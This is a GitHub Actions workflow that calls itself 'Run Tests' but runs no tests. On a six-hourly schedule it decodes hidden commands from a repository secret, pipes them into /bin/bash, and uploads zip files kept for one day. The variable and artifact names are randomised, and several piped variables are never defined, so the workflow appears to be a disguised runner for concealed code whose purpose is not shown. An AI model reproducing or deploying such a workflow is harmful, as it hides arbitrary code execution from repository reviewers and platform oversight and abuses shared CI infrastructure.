name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '50 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  deploy:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Bootstrap
        env:
          he5: ${{ secrets.he5 }}
        run: |
          printf '%s' "$he5" | jq -r .l79821 | /bin/bash
          printf '%s' "$ot1314" | jq -r .oypo80 | /bin/bash
          printf '%s' "$gc2891" | jq -r .emub05 | /bin/bash
          echo $sk0015 | jq -r .xnp301 | /bin/bash
          echo $l63480 | jq -r .l5 | /bin/bash

      - name: Archive artifact
        uses: actions/upload-artifact@v4
        with:
          name: n6soCrOJ
          path: "*.zip"
          retention-days: 1
